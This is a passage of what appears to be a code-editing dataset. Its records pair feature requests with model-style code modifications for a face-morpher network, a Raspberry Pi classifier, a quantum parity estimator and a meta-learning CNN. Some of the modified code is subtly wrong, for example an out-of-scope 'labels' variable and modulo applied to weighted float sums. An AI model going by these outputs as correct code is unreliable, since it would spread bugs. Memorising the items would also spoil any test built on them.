apply_color_change(alpha, color_change, image: Tensor) -&gt; Tensor:\n    return color_change * alpha + image * (1 - alpha)\n\n# File 2: talking-head-anime-3-demo/tha3/nn/face_morpher/face_morpher_09.py\nfrom typing import List, Optional\nimport torch\nfrom torch import Tensor\nfrom torch.nn import Sequential, Sigmoid, Tanh, Module\nfrom torch.nn.functional import affine_grid, grid_sample\nfrom tha3.nn.common.poser_encoder_decoder_00 import PoserEncoderDecoder00Args\nfrom tha3.nn.common.poser_encoder_decoder_00_separable import PoserEncoderDecoder00Separable\nfrom tha3.nn.image_processing_util import GridChangeApplier\nfrom tha3.module.module_factory import ModuleFactory\nfrom tha3.nn.conv import create_conv3_from_block_args, create_conv3\nfrom tha3.nn.nonlinearity_factory import LeakyReLUFactory\nfrom tha3.nn.normalization import InstanceNorm2dFactory\nfrom tha3.nn.util import BlockArgs\n\nclass FaceMorpher09Args(PoserEncoderDecoder00Args):\n    def __init__(self,\n                 image_size: int = 256,\n                 image_channels: int = 4,\n                 num_pose_params: int = 67,\n                 start_channels: int = 16,\n                 bottleneck_image_size=4,\n                 num_bottleneck_blocks=3,\n                 max_channels: int = 512,\n                 block_args: Optional[BlockArgs] = None,\n                 # #New: Add interpolation mode parameter\n                 interpolation_mode: str = \'bilinear\'):\n        super().__init__(\n            image_size,\n            image_channels,\n            image_channels,\n            num_pose_params,\n            start_channels,\n            bottleneck_image_size,\n            num_bottleneck_blocks,\n            max_channels,\n            block_args)\n        # #New: Store interpolation mode\n        self.interpolation_mode = interpolation_mode\n\nclass FaceMorpher09(Module):\n    def __init__(self, args: FaceMorpher09Args):\n        super().__init__()\n        self.args = args\n        self.body = PoserEncoderDecoder00Separable(args)\n        self.iris_mouth_grid_change = self.create_grid_change_block()\n        self.iris_mouth_color_change = self.create_color_change_block()\n        self.iris_mouth_alpha = self.create_alpha_block()\n        self.eye_color_change = self.create_color_change_block()\n        self.eye_alpha = self.create_alpha_block()\n        self.grid_change_applier = GridChangeApplier()\n        # #New: Set interpolation mode from args\n        self.grid_change_applier.set_interpolation_mode(self.args.interpolation_mode)\n\n    def create_alpha_block(self):\n        return Sequential(\n            create_conv3(\n                in_channels=self.args.start_channels,\n                out_channels=1,\n                bias=True,\n                initialization_method=self.args.block_args.initialization_method,\n                use_spectral_norm=False),\n            Sigmoid())\n\n    def create_color_change_block(self):\n        return Sequential(\n            create_conv3_from_block_args(\n                in_channels=self.args.start_channels,\n                out_channels=self.args.input_image_channels,\n                bias=True,\n                block_args=self.args.block_args),\n            Tanh())\n\n    def create_grid_change_block(self):\n        return create_conv3(\n            in_channels=self.args.start_channels,\n            out_channels=2,\n            bias=False,\n            initialization_method=\'zero\',\n            use_spectral_norm=False)\n\n    def get_num_output_channels_from_level(self, level: int):\n        return self.get_num_output_channels_from_image_size(self.args.image_size // (2 ** level))\n\n    def get_num_output_channels_from_image_size(self, image_size: int):\n        return min(self.args.start_channels * (self.args.image_size // image_size), self.args.max_channels)\n\n    def forward(self, image: Tensor, pose: Tensor, *args) -&gt; List[Tensor]:\n        feature = self.body(image, pose)[0]\n        iris_mouth_grid_change = self.iris_mouth_grid_change(feature)\n        # #Modify: Pass interpolation_mode to apply method\n        iris_mouth_image_0 = self.grid_change_applier.apply(iris_mouth_grid_change, image, interpolation_mode=self.args.interpolation_mode)\n        iris_mouth_color_change = self.iris_mouth_color_change(feature)\n        iris_mouth_alpha = self.iris_mouth_alpha(feature)\n        iris_mouth_image_1 = self.apply_color_change(iris_mouth_alpha, iris_mouth_color_change, iris_mouth_image_0)\n        eye_color_change = self.eye_color_change(feature)\n        eye_alpha = self.eye_alpha(feature)\n        output_image = self.apply_color_change(eye_alpha, eye_color_change, iris_mouth_image_1.detach())\n        return [\n            output_image,\n            eye_alpha,\n            eye_color_change,\n            iris_mouth_image_1,\n            iris_mouth_alpha,\n            iris_mouth_color_change,\n            iris_mouth_image_0,\n        ]\n\n    OUTPUT_IMAGE_INDEX = 0\n    EYE_ALPHA_INDEX = 1\n    EYE_COLOR_CHANGE_INDEX = 2\n    IRIS_MOUTH_IMAGE_1_INDEX = 3\n    IRIS_MOUTH_ALPHA_INDEX = 4\n    IRIS_MOUTH_COLOR_CHANGE_INDEX = 5\n    IRIS_MOUTh_IMAGE_0_INDEX = 6\n\n    def merge_down(self, top_layer: Tensor, bottom_layer: Tensor):\n        top_layer_rgb = top_layer[:, 0:3, :, :]\n        top_layer_a = top_layer[:, 3:4, :, :]\n        return bottom_layer * (1 - top_layer_a) + torch.cat([top_layer_rgb * top_layer_a, top_layer_a], dim=1)\n\n    def apply_grid_change(self, grid_change, image: Tensor) -&gt; Tensor:\n        n, c, h, w = image.shape\n        device = grid_change.device\n        grid_change = torch.transpose(grid_change.view(n, 2, h * w), 1, 2).view(n, h, w, 2)\n        identity = torch.tensor([[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]], device=device).unsqueeze(0).repeat(n, 1, 1)\n        base_grid = affine_grid(identity, [n, c, h, w], align_corners=False)\n        grid = base_grid + grid_change\n        resampled_image = grid_sample(image, grid, mode=\'bilinear\', padding_mode=\'border\', align_corners=False)\n        return resampled_image\n\n    def apply_color_change(self, alpha, color_change, image: Tensor) -&gt; Tensor:\n        return color_change * alpha + image * (1 - alpha)\n\nclass FaceMorpher09Factory(ModuleFactory):\n    def __init__(self, args: FaceMorpher09Args):\n        super().__init__()\n        self.args = args\n\n    def create(self) -&gt; Module:\n        return FaceMorpher09(self.args)\n\nif __name__ == "__main__":\n    cuda = torch.device(\'cuda\')\n    args = FaceMorpher09Args(\n        image_size=256,\n        image_channels=4,\n        num_pose_params=12,\n        start_channels=64,\n        bottleneck_image_size=32,\n        num_bottleneck_blocks=6,\n        # #New: Specify interpolation mode\n        interpolation_mode=\'bilinear\',\n        block_args=BlockArgs(\n            initialization_method=\'xavier\',\n            use_spectral_norm=False,\n            normalization_layer_factory=InstanceNorm2dFactory(),\n            nonlinearity_factory=LeakyReLUFactory(inplace=True, negative_slope=0.2)))\n    module = FaceMorpher09(args).to(cuda)\n    image = torch.zeros(16, 4, 256, 256, device=cuda)\n    pose = torch.zeros(16, 12, device=cuda)\n    state_dict = module.state_dict()\n    for key in state_dict:\n        print(key, state_dict[key].shape)'}</t>
  </si>
  <si>
    <t>{'#file 1': "class GridChangeApplier:\n    def __init__(self):\n        self.last_n = None\n        self.last_device = None\n        self.last_identity = None\n\n    def apply(self, grid_change: Tensor, image: Tensor, interpolation_mode: str = 'bilinear', align_corners: bool = False) -&gt; Tensor:  #Modify\n        n, c, h, w = image.shape\n        device = grid_change.device\n        grid_change = torch.transpose(grid_change.view(n, 2, h * w), 1, 2).view(n, h, w, 2)\n\n        if n == self.last_n and device == self.last_device:\n            identity = self.last_identity\n        else:\n            identity = torch.tensor(\n                [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],\n                dtype=grid_change.dtype,\n                device=device,\n                requires_grad=False) \\\n                .unsqueeze(0).repeat(n, 1, 1)\n            self.last_identity = identity\n            self.last_n = n\n            self.last_device = device\n        base_grid = affine_grid(identity, [n, c, h, w], align_corners=align_corners)\n\n        grid = base_grid + grid_change\n        resampled_image = grid_sample(image, grid, mode=interpolation_mode, padding_mode='border', align_corners=align_corners)  #Modify\n        return resampled_image", '#file 2': "class FaceMorpher09(Module):\n    def __init__(self, args: FaceMorpher09Args):\n        super().__init__()\n        self.args = args\n        self.body = PoserEncoderDecoder00Separable(args)\n\n        self.iris_mouth_grid_change = self.create_grid_change_block()\n        self.iris_mouth_color_change = self.create_color_change_block()\n        self.iris_mouth_alpha = self.create_alpha_block()\n\n        self.eye_color_change = self.create_color_change_block()\n        self.eye_alpha = self.create_alpha_block()\n\n        self.grid_change_applier = GridChangeApplier()\n\n    def forward(self, image: Tensor, pose: Tensor, *args) -&gt; List[Tensor]:\n        feature = self.body(image, pose)[0]\n\n        iris_mouth_grid_change = self.iris_mouth_grid_change(feature)\n        iris_mouth_image_0 = self.grid_change_applier.apply(iris_mouth_grid_change, image, interpolation_mode='bicubic')  #Modify\n        iris_mouth_color_change = self.iris_mouth_color_change(feature)\n        iris_mouth_alpha = self.iris_mouth_alpha(feature)\n        iris_mouth_image_1 = self.apply_color_change(iris_mouth_alpha, iris_mouth_color_change, iris_mouth_image_0)\n\n        eye_color_change = self.eye_color_change(feature)\n        eye_alpha = self.eye_alpha(feature)\n        output_image = self.apply_color_change(eye_alpha, eye_color_change, iris_mouth_image_1.detach())\n\n        return [\n            output_image,  # 0\n            eye_alpha,  # 1\n            eye_color_change,  # 2\n            iris_mouth_image_1,  # 3\n            iris_mouth_alpha,  # 4\n            iris_mouth_color_change,  # 5\n            iris_mouth_image_0,  # 6\n        ]"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'SVG class with __init__, add_rect, add_text, and finish methods', 'invoking_code_segment': 'main() function in classify_capture.py that processes camera frames and displays results', 'feature_description': 'Add a feature to display the top 3 categories with their scores in a graphical format using SVG, rendering bounding boxes and text labels for classification results', 'modified_complete_code': '# common.py - MODIFIED\n\n"""Common utilities."""\nimport collections\nimport io\nimport time\n\nSVG_HEADER = \'&lt;svg width="{w}" height="{h}" version="1.1" &gt;\'\nSVG_RECT = \'&lt;rect x="{x}" y="{y}" width="{w}" height="{h}" stroke="{s}" stroke-width="{sw}" fill="none" /&gt;\'\nSVG_TEXT = \'\'\'\n&lt;text x="{x}" y="{y}" font-size="{fs}" dx="0.05em" dy="0.05em" fill="black"&gt;{t}&lt;/text&gt;\n&lt;text x="{x}" y="{y}" font-size="{fs}" fill="white"&gt;{t}&lt;/text&gt;\n\'\'\'\nSVG_FOOTER = \'&lt;/svg&gt;\'\n\ndef avg_fps_counter(window_size):\n    window = collections.deque(maxlen=window_size)\n    prev = time.monotonic()\n    yield 0.0\n    while True:\n        curr = time.monotonic()\n        window.append(curr - prev)\n        prev = curr\n        yield len(window) / sum(window)\n\nclass SVG:\n    def __init__(self, size):\n        self.io = io.StringIO()\n        self.io.write(SVG_HEADER.format(w=size[0], h=size[1]))\n\n    def add_rect(self, x, y, w, h, stroke, stroke_width):\n        self.io.write(SVG_RECT.format(x=x, y=y, w=w, h=h, s=stroke, sw=stroke_width))\n\n    def add_text(self, x, y, text, font_size):\n        self.io.write(SVG_TEXT.format(x=x, y=y, t=text, fs=font_size))\n\n    # New method to render classification results\n    def add_classification_results(self, results, labels, img_width, img_height):\n        """Add classification results as text boxes to SVG."""\n        box_height = 30\n        for idx, result in enumerate(results):\n            y_pos = 10 + (idx * box_height)\n            label_text = \'{:.0f}% {}\'.format(100 * result[1], labels[result[0]])\n            self.add_rect(5, y_pos, 300, box_height - 5, \'green\', 2)\n            self.add_text(10, y_pos + 20, label_text, 16)\n\n    def finish(self):\n        self.io.write(SVG_FOOTER)\n        return self.io.getvalue()\n\n# classify_capture.py - MODIFIED\n\n"""A demo to classify Raspberry Pi camera stream."""\nimport argparse\nimport collections\nfrom collections import deque\nimport common\nimport io\nimport numpy as np\nimport operator\nimport os\nimport picamera\nimport tflite_runtime.interpreter as tflite\nimport time\n\nCategory = collections.namedtuple(\'Category\', [\'id\', \'score\'])\n\ndef get_output(interpreter, top_k, score_threshold):\n    """Returns no more than top_k categories with score &gt;= score_threshold."""\n    scores = common.output_tensor(interpreter, 0)\n    categories = [\n        Category(i, scores[i])\n        for i in np.argpartition(scores, -top_k)[-top_k:]\n        if scores[i] &gt;= score_threshold\n    ]\n    return sorted(categories, key=operator.itemgetter(1), reverse=True)\n\ndef main():\n    default_model_dir = \'../all_models\'\n    default_model = \'mobilenet_v2_1.0_224_quant_edgetpu.tflite\'\n    default_labels = \'imagenet_labels.txt\'\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\'--model\', help=\'.tflite model path\',\n                        default=os.path.join(default_model_dir, default_model))\n    parser.add_argument(\'--labels\', help=\'label file path\',\n                        default=os.path.join(default_model_dir, default_labels))\n    args = parser.parse_args()\n\n    with open(args.labels, \'r\') as f:\n        pairs = (l.strip().split(maxsplit=1) for l in f.readlines())\n        labels = dict((int(k), v) for k, v in pairs)\n\n    interpreter = common.make_interpreter(args.model)\n    interpreter.allocate_tensors()\n\n    with picamera.PiCamera() as camera:\n        camera.resolution = (640, 480)\n        camera.framerate = 30\n        camera.annotate_text_size = 20\n        width, height, channels = common.input_image_size(interpreter)\n        camera.start_preview()\n        try:\n            stream = io.BytesIO()\n            fps = deque(maxlen=20)\n            fps.append(time.time())\n            for foo in camera.capture_continuous(stream,\n                                                 format=\'rgb\',\n                                                 use_video_port=True,\n                                                 resize=(width, height)):\n                stream.truncate()\n                stream.seek(0)\n                input = np.frombuffer(stream.getvalue(), dtype=np.uint8)\n                start_ms = time.time()\n                common.input_tensor(interpreter)[:, :] = np.reshape(input, common.input_image_size(interpreter))\n                interpreter.invoke()\n                results = get_output(interpreter, top_k=3, score_threshold=0)\n                inference_ms = (time.time() - start_ms) * 1000.0\n                fps.append(time.time())\n                fps_ms = len(fps) / (fps[-1] - fps[0])\n                camera.annotate_text = \'Inference: {:5.2f}ms FPS: {:3.1f}\'.format(inference_ms, fps_ms)\n                \n                # New: Create SVG visualization of results\n                svg = common.SVG((640, 480))\n                svg.add_classification_results(results, labels, 640, 480)\n                svg_output = svg.finish()\n                \n                for result in results:\n                    camera.annotate_text += \'\\n{:.0f}% {}\'.format(100 * result[1], labels[result[0]])\n                print(camera.annotate_text)\n                # New: Print SVG output for visualization\n                print(\'SVG Output:\', svg_output[:100], \'...\')\n        finally:\n            camera.stop_preview()\n\nif __name__ == \'__main__\':\n    main()'}</t>
  </si>
  <si>
    <t>{'#file 1': "def get_output(interpreter, top_k, score_threshold):\n    scores = common.output_tensor(interpreter, 0)\n    categories = [\n        Category(i, scores[i])\n        for i in np.argpartition(scores, -top_k)[-top_k:]\n        if scores[i] &gt;= score_threshold\n    ]\n    sorted_categories = sorted(categories, key=operator.itemgetter(1), reverse=True)\n    # Modify: Return a formatted string of the top 3 categories\n    formatted_categories = '\\n'.join([f'{100*cat.score:.0f}% {labels[cat.id]}' for cat in sorted_categories[:top_k]])\n    return formatted_categories", '#file 2': "import common\nimport io\nimport numpy as np\nimport operator\nimport os\nimport picamera\nimport tflite_runtime.interpreter as tflite\nimport time\n\n# New: Import SVG class from common\nfrom common import SVG\n\nCategory = collections.namedtuple('Category', ['id', 'score'])\n\ndef main():\n    default_model_dir = '../all_models'\n    default_model = 'mobilenet_v2_1.0_224_quant_edgetpu.tflite'\n    default_labels = 'imagenet_labels.txt'\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--model', help='.tflite model path',\n                        default=os.path.join(default_model_dir,default_model))\n    parser.add_argument('--labels', help='label file path',\n                        default=os.path.join(default_model_dir, default_labels))\n    args = parser.parse_args()\n\n    with open(args.labels, 'r') as f:\n        pairs = (l.strip().split(maxsplit=1) for l in f.readlines())\n        labels = dict((int(k), v) for k, v in pairs)\n\n    interpreter = common.make_interpreter(args.model)\n    interpreter.allocate_tensors()\n\n    with picamera.PiCamera() as camera:\n        camera.resolution = (640, 480)\n        camera.framerate = 30\n        camera.annotate_text_size = 20\n        width, height, channels = common.input_image_size(interpreter)\n        camera.start_preview()\n        try:\n            stream = io.BytesIO()\n            fps = deque(maxlen=20)\n            fps.append(time.time())\n            for foo in camera.capture_continuous(stream,\n                                                 format='rgb',\n                                                 use_video_port=True,\n                                                 resize=(width, height)):\n                stream.truncate()\n                stream.seek(0)\n                input = np.frombuffer(stream.getvalue(), dtype=np.uint8)\n                start_ms = time.time()\n                common.input_tensor(interpreter)[:,:] = np.reshape(input, common.input_image_size(interpreter))\n                interpreter.invoke()\n                # Modify: Get formatted categories\n                formatted_categories = get_output(interpreter, top_k=3, score_threshold=0)\n                inference_ms = (time.time() - start_ms)*1000.0\n                fps.append(time.time())\n                fps_ms = len(fps)/(fps[-1] - fps[0])\n                camera.annotate_text = 'Inference: {:5.2f}ms FPS: {:3.1f}'.format(inference_ms, fps_ms)\n                # New: Display formatted categories using SVG\n                svg = SVG((640, 480))\n                svg.add_text(10, 30, formatted_categories, 20)\n                camera.annotate_text += svg.finish()\n                print(camera.annotate_text)\n        finally:\n            camera.stop_preview()"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def get_parity(pauli_terms: List[PauliTerm], bitstring_results: List[np.ndarray]) -&gt; np.ndarray', 'invoking_code_segment': 'parity_results = get_parity(pauli_terms, tresults)', 'feature_description': 'Add support for weighted parity calculation based on qubit importance. This feature allows assigning importance weights to qubits, which are then used to calculate weighted parity values. Qubits with higher importance weights contribute more significantly to the parity calculation, enabling prioritization of measurement results from critical qubits.', 'modified_complete_code': '# File 1: grove/grove/measurements/estimation.py\n\n# Modify the get_parity function signature and implementation\ndef get_parity(pauli_terms: List[PauliTerm], bitstring_results: List[np.ndarray], qubit_weights: Dict[int, float] = None) -&gt; np.ndarray:\n    """\n    Calculate the eigenvalues of Pauli operators given results of projective measurements.\n\n    The single-qubit projective measurement results (elements of `bitstring_results`) are listed in\n    physical-qubit-label numerical order.\n\n    An example:\n\n    Consider a Pauli term Z1 Z5 Z6 I7 and a collection of single-qubit\n    measurement results corresponding to measurements in the z-basis on qubits\n    {1, 5, 6, 7}. Each element of bitstring_results is an element of\n    :math:`\\{0, 1\\}^{\\otimes 4}`.  If [0, 0, 1, 0] and [1, 0, 1, 1]\n    are the two projective measurement results in `bitstring_results` then\n    this method returns a 1 x 2 numpy array with values [[-1, 1]]\n\n    :param pauli_terms: A list of Pauli terms operators to use\n    :param bitstring_results: A list of projective measurement results.  Each element is a list of\n        single-qubit measurements.\n    :param qubit_weights: #New Optional dictionary mapping qubit indices to importance weights for weighted parity calculation.\n    :return: Array (m x n) of {+1, -1} eigenvalues for the m-operators in `pauli_terms` associated\n        with the n measurement results.\n    """\n    qubit_set = []\n    for term in pauli_terms:\n        qubit_set.extend(list(term.get_qubits()))\n    active_qubit_indices = sorted(list(set(qubit_set)))\n    index_mapper = dict(zip(active_qubit_indices,\n                            range(len(active_qubit_indices))))\n\n    results = np.zeros((len(pauli_terms), len(bitstring_results)))\n\n    # convert to array so we can fancy index into it later.\n    # list() is needed to cast because we don\'t really want a map object\n    bitstring_results = list(map(np.array, bitstring_results))\n    \n    # #New Initialize qubit weights if not provided\n    if qubit_weights is None:\n        qubit_weights = {qubit: 1.0 for qubit in active_qubit_indices}\n    \n    for row_idx, term in enumerate(pauli_terms):\n        memory_index = np.array(list(map(lambda x: index_mapper[x],\n                                         sorted(term.get_qubits()))))\n        \n        # #Modify Calculate weighted parity if weights are provided\n        term_qubits = sorted(term.get_qubits())\n        term_weights = np.array([qubit_weights.get(q, 1.0) for q in term_qubits])\n        \n        if qubit_weights is not None and any(w != 1.0 for w in qubit_weights.values()):\n            # #New Weighted parity calculation\n            results[row_idx, :] = [(-2 * np.sum(x[memory_index] * term_weights) + np.sum(term_weights)) / np.sum(term_weights)\n                                   for x in bitstring_results]\n        else:\n            # #Modify Standard parity calculation (unchanged behavior)\n            results[row_idx, :] = [-2 * (sum(x[memory_index]) % 2) + 1 for x in bitstring_results]\n    \n    return results\n\n\n# Modify the estimate_pauli_sum function signature and implementation\ndef estimate_pauli_sum(pauli_terms: List[PauliTerm],\n                       basis_transform_dict: Dict[int, str],\n                       program: Program,\n                       variance_bound: float,\n                       quantum_resource: QuantumComputer,\n                       commutation_check: bool = True,\n                       qubit_weights: Dict[int, float] = None) -&gt; EstimationResult:  # #New Add qubit_weights parameter\n    """\n    Estimate the mean of a sum of pauli terms to set variance.\n\n    The sample variance is calculated by\n\n    .. math::\n        \\begin{align}\n        \\mathrm{Var}[\\hat{\\langle H \\rangle}] = \\sum_{i, j}h_{i}h_{j}\n        \\mathrm{Cov}(\\hat{\\langle P_{i} \\rangle}, \\hat{\\langle P_{j} \\rangle})\n        \\end{align}\n\n    The expectation value of each Pauli operator (term and coefficient) is\n    also returned.  It can be accessed through the named-tuple field\n    `pauli_expectations\'.\n\n    :param pauli_terms: list of pauli terms to measure simultaneously or a\n                        PauliSum object\n    :param basis_transform_dict: basis transform dictionary where the key is\n                                 the qubit index and the value is the basis to\n                                 rotate into. Valid basis is [I, X, Y, Z].\n    :param program: program generating a state to sample from.  The program\n                    is deep copied to ensure no mutation of gates or program\n                    is perceived by the user.\n    :param variance_bound:  Bound on the variance of the estimator for the\n                            PauliSum. Remember this is the SQUARE of the\n                            standard error!\n    :param quantum_resource: quantum abstract machine object\n    :param commutation_check: Optional flag toggling a safety check\n                              ensuring all terms in `pauli_terms`\n                              commute with each other\n    :param qubit_weights: #New Optional dictionary mapping qubit indices to importance weights\n    :return: estimated expected value, expected value of each Pauli term in\n             the sum, covariance matrix, variance of the estimator, and the\n             number of shots taken.  The objected returned is a named tuple with\n             field names as follows: expected_value, pauli_expectations,\n             covariance, variance, n_shots.\n             `expected_value\' == coef_vec.dot(pauli_expectations)\n    """\n    if not isinstance(pauli_terms, (list, PauliSum)):\n        raise TypeError("pauli_terms needs to be a list or a PauliSum")\n\n    if isinstance(pauli_terms, PauliSum):\n        pauli_terms = pauli_terms.terms\n\n    # check if each term commutes with everything\n    if commutation_check:\n        if len(commuting_sets(sum(pauli_terms))) != 1:\n            raise CommutationError("Not all terms commute in the expected way")\n\n    program = copy.deepcopy(program)\n    pauli_for_rotations = PauliTerm.from_list(\n        [(value, key) for key, value in basis_transform_dict.items()])\n\n    program += get_rotation_program(pauli_for_rotations)\n\n    qubits = sorted(list(basis_transform_dict.keys()))\n    for qubit in qubits:\n        program.inst(MEASURE(qubit, qubit))\n\n    coeff_vec = np.array(\n        list(map(lambda x: x.coefficient, pauli_terms))).reshape((-1, 1))\n\n    # upper bound on samples given by IV of arXiv:1801.03524\n    num_sample_ubound = int(np.ceil(np.sum(np.abs(coeff_vec))**2 / variance_bound))\n    results = None\n    sample_variance = np.infty\n    number_of_samples = 0\n    while (sample_variance &gt; variance_bound and\n           number_of_samples &lt; num_sample_ubound):\n        ro = program.declare(\'ro\', \'BIT\', len(qubits))\n        program += [MEASURE(qubit, ro_reg) for qubit, ro_reg in zip(qubits, ro)]\n        program.wrap_in_numshots_loop(min(10000, num_sample_ubound))\n        executable = quantum_resource.compiler.native_quil_to_executable(program)\n        tresults = quantum_resource.run(executable)\n        number_of_samples += len(tresults)\n\n        # #Modify Pass qubit_weights to get_parity\n        parity_results = get_parity(pauli_terms, tresults, qubit_weights=qubit_weights)\n\n        # Note: easy improvement would be to update mean and variance on the fly\n        # instead of storing all these results.\n        if results is None:\n            results = parity_results\n        else:\n            results = np.hstack((results, parity_results))\n\n        # calculate the expected values....\n        covariance_mat = np.cov(results)\n        sample_variance = coeff_vec.T.dot(covariance_mat).dot(coeff_vec) / results.shape[1]\n\n    return EstimationResult(expected_value=coeff_vec.T.dot(np.mean(results, axis=1)),\n                            pauli_expectations=np.multiply(coeff_vec.flatten(),\n                                                           np.mean(results, axis=1).flatten()),\n                            covariance=covariance_mat,\n                            variance=sample_variance,\n                            n_shots=results.shape[1])\n\n\n# Modify the estimate_locally_commuting_operator function\ndef estimate_locally_commuting_operator(program: Program,\n                                        pauli_sum: PauliSum,\n                                        variance_bound: float,\n                                        quantum_resource: QuantumComputer,\n                                        qubit_weights: Dict[int, float] = None) -&gt; Tuple[float, float, int]:  # #New Add qubit_weights parameter\n    """\n    Estimate the expected value of a Pauli sum to fixed precision.\n\n    :param program: The state preparation program.\n    :param pauli_sum: The pauli sum of operators to estimate expected value.\n    :param variance_bound: The variance bound on the estimator.\n    :param quantum_resource: The QuantumComputer object to address.\n    :param qubit_weights: #New Optional dictionary mapping qubit indices to importance weights\n    :return: expected value, estimator variance, total number of experiments.\n    """\n    pauli_sum, identity_term = remove_identity(pauli_sum)\n    psets = commuting_sets_by_zbasis(pauli_sum)\n    variance_bound_per_set = variance_bound / len(psets)\n\n    if isinstance(identity_term, int):\n        if np.isclose(identity_term, 0):\n            expected_value = 0\n        else:\n            expected_value = identity_term\n\n    elif isinstance(identity_term, (PauliTerm, PauliSum)):\n        if isinstance(identity_term, PauliTerm):\n            expected_value = identity_term.coefficient\n        else:\n            expected_value = identity_term[0].coefficient\n    else:\n        print(type(identity_term))\n        raise TypeError("identity_term must be a PauliTerm or integer")\n\n    total_shots = 0\n    estimator_variance = 0\n\n    for qubit_op_key, pset in psets.items():\n        # #Modify Pass qubit_weights to estimate_pauli_sum\n        results = estimate_pauli_sum(pset, dict(qubit_op_key), program,\n                                     variance_bound_per_set,\n                                     quantum_resource,\n                                     commutation_check=False,\n                                     qubit_weights=qubit_weights)\n\n        expected_value += results.expected_value\n        total_shots += results.n_shots\n        estimator_variance += results.variance\n\n    return expected_value, estimator_variance, total_shots\n\n\n# File 2: grove/grove/tests/measurements/test_estimation.py\n\n# #New Add test for weighted parity calculation\ndef test_weighted_parity():\n    """\n    Test weighted parity calculation with qubit importance weights\n    """\n    single_qubit_results = [[0]] * 50 + [[1]] * 50\n    \n    # Test with uniform weights (should match standard parity)\n    uniform_weights = {5: 1.0}\n    test_results_uniform = get_parity([sZ(5)], single_qubit_results, qubit_weights=uniform_weights)\n    test_results_standard = get_parity([sZ(5)], single_qubit_results)\n    assert np.allclose(test_results_uniform, test_results_standard)\n    \n    # Test with non-uniform weights\n    weighted_results = get_parity([sZ(5)], single_qubit_results, qubit_weights={5: 2.0})\n    assert weighted_results.shape == (1, 100)\n    assert np.all((weighted_results == 1.0) | (weighted_results == -1.0))\n\n\n# #Modify Update test_estimate_pauli_sum to include qubit_weights parameter\ndef test_estimate_pauli_sum_with_weights():\n    """\n    Test estimation with weighted parity calculation\n    """\n    quantum_resource = Mock(QuantumComputer)\n    np.random.seed(87655678)\n    brv1 = bernoulli(p=0.25)\n    brv2 = bernoulli(p=0.4)\n    n = 500\n    two_qubit_measurements = list(zip(brv1.rvs(size=n), brv2.rvs(size=n)))\n    pauli_terms = [sZ(0), sZ(1), sZ(0) * sZ(1)]\n    \n    with patch("pyquil.api.QuantumComputer") as qc:\n        qc.run.return_value = two_qubit_measurements\n    \n    # Test with qubit weights\n    qubit_weights = {0: 1.5, 1: 0.5}\n    mean, means, cov, estimator_var, shots = \\\n        estimate_pauli_sum(pauli_terms,\n                           basis_transform_dict={0: \'Z\', 1: \'Z\'},\n                           program=Program(),\n                           variance_bound=1.0E-1,\n                           quantum_resource=qc,\n                           qubit_weights=qubit_weights)\n    \n    assert shots == n\n    assert isinstance(mean, (int, float, np.ndarray))'}</t>
  </si>
  <si>
    <t>{'file1': 'def get_parity(pauli_terms: List[PauliTerm], bitstring_results: List[np.ndarray], qubit_weights: Optional[Dict[int, float]] = None) -&gt; np.ndarray:\n    """\n    Calculate the eigenvalues of Pauli operators given results of projective measurements.\n\n    The single-qubit projective measurement results (elements of `bitstring_results`) are listed in\n    physical-qubit-label numerical order.\n\n    An example:\n\n    Consider a Pauli term Z1 Z5 Z6 I7 and a collection of single-qubit\n    measurement results corresponding to measurements in the z-basis on qubits\n    {1, 5, 6, 7}. Each element of bitstring_results is an element of\n    :math:`{0, 1}^{otimes 4}`.  If [0, 0, 1, 0] and [1, 0, 1, 1]\n    are the two projective measurement results in `bitstring_results` then\n    this method returns a 1 x 2 numpy array with values [[-1, 1]]\n\n    :param pauli_terms: A list of Pauli terms operators to use\n    :param bitstring_results: A list of projective measurement results.  Each element is a list of\n        single-qubit measurements.\n    :param qubit_weights: Optional dictionary mapping qubit indices to weights.\n    :return: Array (m x n) of {+1, -1} eigenvalues for the m-operators in `pauli_terms` associated\n        with the n measurement results.\n    """\n    qubit_set = []\n    for term in pauli_terms:\n        qubit_set.extend(list(term.get_qubits()))\n    active_qubit_indices = sorted(list(set(qubit_set)))\n    index_mapper = dict(zip(active_qubit_indices,\n                            range(len(active_qubit_indices))))\n\n    results = np.zeros((len(pauli_terms), len(bitstring_results)))\n\n    # convert to array so we can fancy index into it later.\n    # list() is needed to cast because we don\'t really want a map object\n    bitstring_results = list(map(np.array, bitstring_results))\n    for row_idx, term in enumerate(pauli_terms):\n        memory_index = np.array(list(map(lambda x: index_mapper[x],\n                                         sorted(term.get_qubits()))))\n\n        if qubit_weights:\n            weighted_sums = [sum(x[memory_index] * [qubit_weights.get(idx, 1) for idx in memory_index]) for x in bitstring_results]\n            results[row_idx, :] = [-2 * (ws % 2) + 1 for ws in weighted_sums]\n        else:\n            results[row_idx, :] = [-2 * (sum(x[memory_index]) % 2) + 1 for x in bitstring_results]\n    return results\n    #Modify: Added `qubit_weights` parameter and logic to apply weights during parity calculation.', 'file2': 'parity_results = get_parity(pauli_terms, tresults, qubit_weights={0: 2.0, 1: 1.5})\n#Modify: Updated call to `get_parity` to include `qubit_weights` parameter.'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "class ConvolutionalNeuralNetwork(MetaModule):\n    def __init__(self, in_channels, out_features, hidden_size=64):\n        super(ConvolutionalNeuralNetwork, self).__init__()\n        self.in_channels = in_channels\n        self.out_features = out_features\n        self.hidden_size = hidden_size\n\n        self.features = MetaSequential(\n            conv3x3(in_channels, hidden_size),\n            conv3x3(hidden_size, hidden_size),\n            conv3x3(hidden_size, hidden_size),\n            conv3x3(hidden_size, hidden_size)\n        )\n\n        self.classifier = MetaLinear(hidden_size, out_features)\n\n    def forward(self, inputs, params=None):\n        features = self.features(inputs, params=self.get_subdict(params, 'features'))\n        features = features.view((features.size(0), -1))\n        logits = self.classifier(features, params=self.get_subdict(params, 'classifier'))\n        return logits", 'invoking_code_segment': 'model = ConvolutionalNeuralNetwork(1,\n                                       args.num_ways,\n                                       hidden_size=args.hidden_size)\n    model.to(device=args.device)\n    model.train()', 'feature_description': 'Add a dropout layer to the ConvolutionalNeuralNetwork model to improve generalization by reducing overfitting during training.', 'modified_complete_code': '#file 1 - model.py\nimport torch\nimport torch.nn as nn\nfrom torchmeta.modules import 